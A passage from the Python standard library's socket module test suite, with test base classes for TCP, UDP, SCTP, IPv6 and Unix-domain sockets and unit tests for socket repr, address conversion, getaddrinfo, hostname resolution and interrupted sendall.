class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't masks failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup choses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not stricly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
